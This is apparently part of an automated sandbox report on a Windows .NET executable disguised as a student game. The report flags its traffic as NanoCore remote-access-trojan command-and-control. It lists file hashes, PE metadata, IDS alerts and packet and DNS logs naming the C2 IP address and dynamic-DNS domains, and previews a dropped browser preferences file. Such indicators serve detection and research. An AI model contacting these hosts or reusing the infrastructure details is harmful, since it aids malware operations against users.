Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....&..(......s.........s ........s!........s"........s#...........0...........~....o$....+...0...........~....o%....+...0...........~....o&....+...0...........~....o'....+...0...........~....o(....+...0..<........~.....().....,!r...p.....(...o+...s,............~.....+...0...........~.....+.."........0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......

C:\Users\user\AppData\Roaming\kDIaJxw.tmp Download File
Process:	C:\ProgramData\images.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	87165
Entropy (8bit):	6.102565506017432
Encrypted:	false
SSDEEP:	1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
MD5:	CC02ABB348037609ED09EC9157D55234
SHA1:	32411A59960ECF4D7434232194A5B3DB55817647
SHA-256:	62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
SHA-512:	AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Roaming\sGwItoz.tmp Download File
Process:	C:\ProgramData\images.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.518165195771859
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Xjf4yH9N2t.exe
File size:	1309184
MD5:	2318b60075e442cb6141535e268e4df0
SHA1:	6d2e6e0bfdb0e649e0079533ecdbe302ff9dc8b5
SHA256:	cdbe67339a29bfe3066a18b4e68e9b19e28e449ab21ce23a85ed15e04c5255df
SHA512:	160013eed136f4db2f3ab2b662e62966daa6959c3ff5dbb8125e3e49f8d41e63ca5ca65ffe5f85370e27c39870bfe3d2dc3f09d629665b59e71e7c32a5c94413
SSDEEP:	24576:HCIH76DO6fx8Dgyfx8Dgxz2MqBSYe6bOnb7IwDZN2L:pH76X58Dgy58DgxiMdYe6qnb7/Z4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b..a..............P..............<... ...@....@.. .......................@............@................................

File Icon


Icon Hash:	b07968fcd4ec7090

Static PE Info

General
Entrypoint:	0x533cca
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61079A62 [Mon Aug 2 07:10:26 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x133c78	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x134000	0xd628	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x142000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x131cd0	0x131e00	False	0.70481871935	data	7.55041675876	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x134000	0xd628	0xd800	False	0.708423755787	data	6.59756750685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x142000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x134200	0x2e8	data
RT_ICON	0x1344f8	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x134630	0xea8	data
RT_ICON	0x1354e8	0x8a8	data
RT_ICON	0x135da0	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x136318	0x7228	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x13d550	0x25a8	data
RT_ICON	0x13fb08	0x10a8	data
RT_ICON	0x140bc0	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x141038	0x84	data
RT_VERSION	0x1410cc	0x35c	data
RT_MANIFEST	0x141438	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright Casper College 2009
Assembly Version	1.0.0.0
InternalName	MdaHelp.exe
FileVersion	1.0.0.0
CompanyName	Casper College
LegalTrademarks
Comments
ProductName	pacman2008_01
ProductVersion	1.0.0.0
FileDescription	pacman2008_01
OriginalFilename	MdaHelp.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/02/21-10:18:17.690401	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49738	8234	192.168.2.3	203.159.80.186
08/02/21-10:18:24.066201	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49739	8234	192.168.2.3	203.159.80.186
08/02/21-10:18:30.089540	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49740	8234	192.168.2.3	203.159.80.186
08/02/21-10:18:36.366088	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49741	8234	192.168.2.3	203.159.80.186
08/02/21-10:18:43.127266	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49744	8234	192.168.2.3	203.159.80.186
08/02/21-10:18:49.312084	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49745	8234	192.168.2.3	203.159.80.186
08/02/21-10:18:54.302993	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49746	8234	192.168.2.3	203.159.80.186
08/02/21-10:19:01.430873	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49747	8234	192.168.2.3	203.159.80.186
08/02/21-10:19:08.624919	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49748	8234	192.168.2.3	203.159.80.186

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2021 10:17:46.562640905 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:46.591439009 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:46.593240976 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:46.650010109 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:46.692487001 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:46.876734972 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:46.969621897 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:46.969803095 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.056157112 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.126133919 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.127099991 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.130064964 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.178797960 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.232239008 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.232425928 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.232605934 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.232635975 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.232759953 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.232883930 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.262260914 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.262357950 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.262489080 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.262505054 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.262566090 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.262646914 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.264136076 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.264290094 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.264415026 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.264425039 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.264558077 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.264669895 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.291759968 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.291800976 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.291830063 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.291857958 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.291933060 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.291958094 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.292027950 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.292092085 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.292133093 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.292171001 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.292196035 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.292279005 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.293761015 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.293806076 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.293843031 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.293880939 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.293900967 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.293924093 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.293951035 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.293966055 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.294003963 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.294030905 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.294039965 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.294217110 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.321932077 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.321990013 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.322037935 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.322079897 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.322098017 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.322118998 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.322156906 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.322156906 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.322194099 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.322205067 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.322231054 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.322269917 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.322307110 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.322354078 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.322360039 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.322396040 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.322432995 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.322451115 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.322474957 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.322511911 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.322547913 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.322570086 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.322609901 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.327577114 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.327625036 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.327666998 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.327702999 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.327740908 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.327783108 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.327800989 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.327820063 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.327857971 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.327894926 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.327905893 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.327915907 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.327939987 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.327984095 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.327997923 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.328018904 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.328057051 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.328094006 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.328111887 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.328130960 CEST	6703	49727	203.159.80.186	192.168.2.3
Aug 2, 2021 10:17:47.328136921 CEST	49727	6703	192.168.2.3	203.159.80.186
Aug 2, 2021 10:17:47.328169107 CEST	6703	49727	203.159.80.186	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2021 10:16:52.014514923 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:16:52.039331913 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 2, 2021 10:16:52.640094042 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:16:52.666322947 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 2, 2021 10:16:53.255062103 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:16:53.288430929 CEST	53	65110	8.8.8.8	192.168.2.3
Aug 2, 2021 10:16:53.923527002 CEST	58361	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:16:53.950793028 CEST	53	58361	8.8.8.8	192.168.2.3
Aug 2, 2021 10:16:54.407705069 CEST	63492	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:16:54.443326950 CEST	53	63492	8.8.8.8	192.168.2.3
Aug 2, 2021 10:16:54.540355921 CEST	60831	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:16:54.565512896 CEST	53	60831	8.8.8.8	192.168.2.3
Aug 2, 2021 10:16:55.196198940 CEST	60100	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:16:55.221283913 CEST	53	60100	8.8.8.8	192.168.2.3
Aug 2, 2021 10:16:55.924659967 CEST	53195	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:16:55.951212883 CEST	53	53195	8.8.8.8	192.168.2.3
Aug 2, 2021 10:16:57.101675987 CEST	50141	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:16:57.137480021 CEST	53	50141	8.8.8.8	192.168.2.3
Aug 2, 2021 10:16:58.194892883 CEST	53023	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:16:58.222788095 CEST	53	53023	8.8.8.8	192.168.2.3
Aug 2, 2021 10:16:58.970942020 CEST	49563	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:16:59.006326914 CEST	53	49563	8.8.8.8	192.168.2.3
Aug 2, 2021 10:16:59.788985968 CEST	51352	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:16:59.817873955 CEST	53	51352	8.8.8.8	192.168.2.3
Aug 2, 2021 10:17:00.476982117 CEST	59349	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:17:00.503283024 CEST	53	59349	8.8.8.8	192.168.2.3
Aug 2, 2021 10:17:01.171550035 CEST	57084	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:17:01.197033882 CEST	53	57084	8.8.8.8	192.168.2.3
Aug 2, 2021 10:17:01.892528057 CEST	58823	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:17:01.920002937 CEST	53	58823	8.8.8.8	192.168.2.3
Aug 2, 2021 10:17:02.539330006 CEST	57568	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:17:02.575206995 CEST	53	57568	8.8.8.8	192.168.2.3
Aug 2, 2021 10:17:03.384495974 CEST	50540	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:17:03.412496090 CEST	53	50540	8.8.8.8	192.168.2.3
Aug 2, 2021 10:17:27.381014109 CEST	54366	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:17:27.414448977 CEST	53	54366	8.8.8.8	192.168.2.3
Aug 2, 2021 10:17:28.106956959 CEST	53034	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:17:28.141330004 CEST	53	53034	8.8.8.8	192.168.2.3
Aug 2, 2021 10:17:46.512516975 CEST	57762	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:17:46.556118965 CEST	53	57762	8.8.8.8	192.168.2.3
Aug 2, 2021 10:17:46.629009962 CEST	55435	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:17:46.665653944 CEST	53	55435	8.8.8.8	192.168.2.3
Aug 2, 2021 10:17:47.187045097 CEST	50713	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:17:47.228749990 CEST	53	50713	8.8.8.8	192.168.2.3
Aug 2, 2021 10:17:47.507148981 CEST	56132	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:17:47.547542095 CEST	53	56132	8.8.8.8	192.168.2.3
Aug 2, 2021 10:18:02.015377998 CEST	58987	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:18:02.062906027 CEST	53	58987	8.8.8.8	192.168.2.3
Aug 2, 2021 10:18:05.265970945 CEST	56579	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:18:05.329832077 CEST	53	56579	8.8.8.8	192.168.2.3
Aug 2, 2021 10:18:17.409890890 CEST	60633	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:18:17.547638893 CEST	53	60633	8.8.8.8	192.168.2.3
Aug 2, 2021 10:18:24.000056982 CEST	61292	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:18:24.032999039 CEST	53	61292	8.8.8.8	192.168.2.3
Aug 2, 2021 10:18:30.012474060 CEST	63619	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:18:30.047801971 CEST	53	63619	8.8.8.8	192.168.2.3
Aug 2, 2021 10:18:36.294145107 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:18:36.327006102 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 2, 2021 10:18:37.690383911 CEST	61946	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:18:37.722863913 CEST	53	61946	8.8.8.8	192.168.2.3
Aug 2, 2021 10:18:40.352721930 CEST	64910	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:18:40.393965960 CEST	53	64910	8.8.8.8	192.168.2.3
Aug 2, 2021 10:18:43.063059092 CEST	52123	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:18:43.096067905 CEST	53	52123	8.8.8.8	192.168.2.3
Aug 2, 2021 10:18:49.128809929 CEST	56130	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:18:49.273305893 CEST	53	56130	8.8.8.8	192.168.2.3
Aug 2, 2021 10:18:54.231587887 CEST	56338	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:18:54.266047955 CEST	53	56338	8.8.8.8	192.168.2.3
Aug 2, 2021 10:19:01.357726097 CEST	59420	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:19:01.393486023 CEST	53	59420	8.8.8.8	192.168.2.3
Aug 2, 2021 10:19:08.561073065 CEST	58784	53	192.168.2.3	8.8.8.8
Aug 2, 2021 10:19:08.594361067 CEST	53	58784	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 2, 2021 10:17:46.512516975 CEST	192.168.2.3	8.8.8.8	0x571d	Standard query (0)	sdafsdffssffs.ydns.eu	A (IP address)	IN (0x0001)
Aug 2, 2021 10:17:47.507148981 CEST	192.168.2.3	8.8.8.8	0x1584	Standard query (0)	hutyrtit.ydns.eu	A (IP address)	IN (0x0001)
Aug 2, 2021 10:18:17.409890890 CEST	192.168.2.3	8.8.8.8	0xd5ab	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)
Aug 2, 2021 10:18:24.000056982 CEST	192.168.2.3	8.8.8.8	0x2bd8	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)
Aug 2, 2021 10:18:30.012474060 CEST	192.168.2.3	8.8.8.8	0x8265	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)
Aug 2, 2021 10:18:36.294145107 CEST	192.168.2.3	8.8.8.8	0x126c	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)
Aug 2, 2021 10:18:43.063059092 CEST	192.168.2.3	8.8.8.8	0xb4f	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)
Aug 2, 2021 10:18:49.128809929 CEST	192.168.2.3	8.8.8.8	0xecfa	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)
Aug 2, 2021 10:18:54.231587887 CEST	192.168.2.3	8.8.8.8	0xca75	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)
